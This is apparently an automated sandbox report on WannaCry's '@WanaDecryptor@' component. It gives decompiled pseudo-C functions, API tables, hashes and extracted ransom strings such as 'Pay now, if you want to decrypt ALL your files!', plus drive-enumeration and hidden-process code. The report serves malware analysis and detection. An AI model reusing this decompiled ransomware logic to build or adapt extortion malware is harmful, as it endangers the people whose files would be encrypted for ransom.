                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                                      0x004038f6
                                                      0x004038f8
                                                      0x004038fd
                                                      0x004038fe
                                                      0x00403905
                                                      0x0040390d
                                                      0x00403911
                                                      0x0040392c
                                                      0x00403931
                                                      0x00403948
                                                      0x0040394d
                                                      0x0040394f
                                                      0x00403953
                                                      0x00403953
                                                      0x0040395c
                                                      0x0040396f
                                                      0x0040397a
                                                      0x00403980
                                                      0x0040399a
                                                      0x004039b6
                                                      0x004039bb
                                                      0x004039bd
                                                      0x004039bf
                                                      0x004039c1
                                                      0x004039c3
                                                      0x00000000
                                                      0x004039c3
                                                      0x0040399c
                                                      0x004039a1
                                                      0x004039a3
                                                      0x004039a5
                                                      0x004039a7
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039c8
                                                      0x004039a1
                                                      0x004039d1
                                                      0x004039dc
                                                      0x004039dc
                                                      0x004039e5
                                                      0x004039f1
                                                      0x004039fe
                                                      0x00403a0a
                                                      0x00403a17

                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      • %08X.dky, xrefs: 00403969
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                                      0x00404090
                                                      0x00404092
                                                      0x00404097
                                                      0x0040409d
                                                      0x0040409e
                                                      0x004040a5
                                                      0x004040a9
                                                      0x004040ac
                                                      0x004040b0
                                                      0x004040b5
                                                      0x004040c2
                                                      0x004040c6
                                                      0x004040ce
                                                      0x004040d5
                                                      0x004040da
                                                      0x004040dd
                                                      0x004040e4
                                                      0x004040eb
                                                      0x004040f0
                                                      0x004040f6
                                                      0x004040fb
                                                      0x004040fe
                                                      0x0040410f
                                                      0x00404112
                                                      0x00404115
                                                      0x00404120
                                                      0x00404129
                                                      0x0040412c
                                                      0x00404139
                                                      0x00404143

                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                                      0x00407cb0
                                                      0x00407cb2
                                                      0x00407cbd
                                                      0x00407cbe
                                                      0x00407cc5
                                                      0x00407cd1
                                                      0x00407cda
                                                      0x00407ce5
                                                      0x00407cea
                                                      0x00407cf5
                                                      0x00407cfc
                                                      0x00407d07
                                                      0x00407d12
                                                      0x00407d1a
                                                      0x00407d26
                                                      0x00407d31
                                                      0x00407d35
                                                      0x00407d47
                                                      0x00407d4f
                                                      0x00407d5b
                                                      0x00407d66
                                                      0x00407d6e
                                                      0x00407d77
                                                      0x00407d7f
                                                      0x00407d88
                                                      0x00407d93
                                                      0x00407d9f
                                                      0x00407dac

                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				intOrPtr* _t68;
				signed int _t76;
				struct HWND__* _t92;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t120;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_t68 =  *0x422210; // 0xb828e8
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_t113 =  *0x422210; // 0xb828e8
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							_t114 =  *0x422210; // 0xb828e8
							 *((intOrPtr*)( *_t114 + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							_t118 =  *0x422210; // 0xb828e8
							 *((intOrPtr*)( *_t118 + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						_t120 =  *0x422210; // 0xb828e8
						 *((intOrPtr*)( *_t120 + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}




































                                                      0x0040c240
                                                      0x0040c248
                                                      0x0040c253
                                                      0x0040c25a
                                                      0x0040c260
                                                      0x0040c26c
                                                      0x0040c283
                                                      0x0040c28e
                                                      0x0040c293
                                                      0x0040c296
                                                      0x0040c29b
                                                      0x0040c2a0
                                                      0x0040c2c8
                                                      0x0040c2d7
                                                      0x0040c2e3
                                                      0x0040c2e3
                                                      0x0040c2ec
                                                      0x0040c2ee
                                                      0x0040c2f3
                                                      0x0040c303
                                                      0x0040c307
                                                      0x0040c309
                                                      0x0040c30e
                                                      0x0040c31f
                                                      0x0040c330
                                                      0x0040c340
                                                      0x0040c342
                                                      0x0040c347
                                                      0x0040c34b
                                                      0x0040c350
                                                      0x0040c35b
                                                      0x0040c35d
                                                      0x0040c362
                                                      0x0040c366
                                                      0x0040c372
                                                      0x0040c373
                                                      0x0040c378
                                                      0x0040c37d
                                                      0x0040c382
                                                      0x0040c38f
                                                      0x0040c39f
                                                      0x0040c3a0
                                                      0x0040c3a7
                                                      0x0040c3e2
                                                      0x0040c3ee
                                                      0x0040c3ee
                                                      0x0040c3f0
                                                      0x0040c3fa
                                                      0x0040c402
                                                      0x0040c403
                                                      0x0040c411
                                                      0x0040c417
                                                      0x0040c452
                                                      0x0040c458
                                                      0x0040c45c
                                                      0x0040c470
                                                      0x0040c472
                                                      0x0040c477
                                                      0x0040c489
                                                      0x0040c48f
                                                      0x0040c494
                                                      0x0040c497
                                                      0x0040c497
                                                      0x0040c477
                                                      0x0040c45c
                                                      0x0040c49e
                                                      0x0040c4a9
                                                      0x0040c4a9
                                                      0x0040c4ab
                                                      0x0040c4b3
                                                      0x0040c4b6
                                                      0x0040c4c1
                                                      0x0040c4c5
                                                      0x0040c4ca
                                                      0x0040c419
                                                      0x0040c41b
                                                      0x0040c427
                                                      0x0040c427
                                                      0x0040c429
                                                      0x0040c431
                                                      0x0040c438
                                                      0x0040c448
                                                      0x0040c448
                                                      0x00000000
                                                      0x0040c3a9
                                                      0x0040c3ab
                                                      0x0040c3b7
                                                      0x0040c3b7
                                                      0x0040c3b9
                                                      0x0040c3c1
                                                      0x0040c3c8
                                                      0x0040c3d8
                                                      0x0040c4cc
                                                      0x0040c4d7
                                                      0x0040c4e4
                                                      0x0040c4e4
                                                      0x0040c3a7
                                                      0x0040c2a2
                                                      0x0040c2ab
                                                      0x0040c2b6
                                                      0x0040c2b6
                                                      0x0040c2bc
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823fclosefopenfwrite
                                                      • String ID:
                                                      • API String ID: 1132507536-0
                                                      • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                                      • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}








                                                      0x00401aa0
                                                      0x00401aa8
                                                      0x00401ab5
                                                      0x00401abb
                                                      0x00401ac5
                                                      0x00401ad2
                                                      0x00401ad6
                                                      0x00401ade
                                                      0x00401aeb
                                                      0x00401b4c
                                                      0x00401aed
                                                      0x00401aed
                                                      0x00401af3
                                                      0x00401b03
                                                      0x00401b0c
                                                      0x00401b0c
                                                      0x00401b12
                                                      0x00401b18
                                                      0x00401b20
                                                      0x00401b20
                                                      0x00401b18
                                                      0x00401b31
                                                      0x00401b38
                                                      0x00401b44
                                                      0x00401b44

                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                      • String ID: D
                                                      • API String ID: 786732093-2746444292
                                                      • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                                      • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
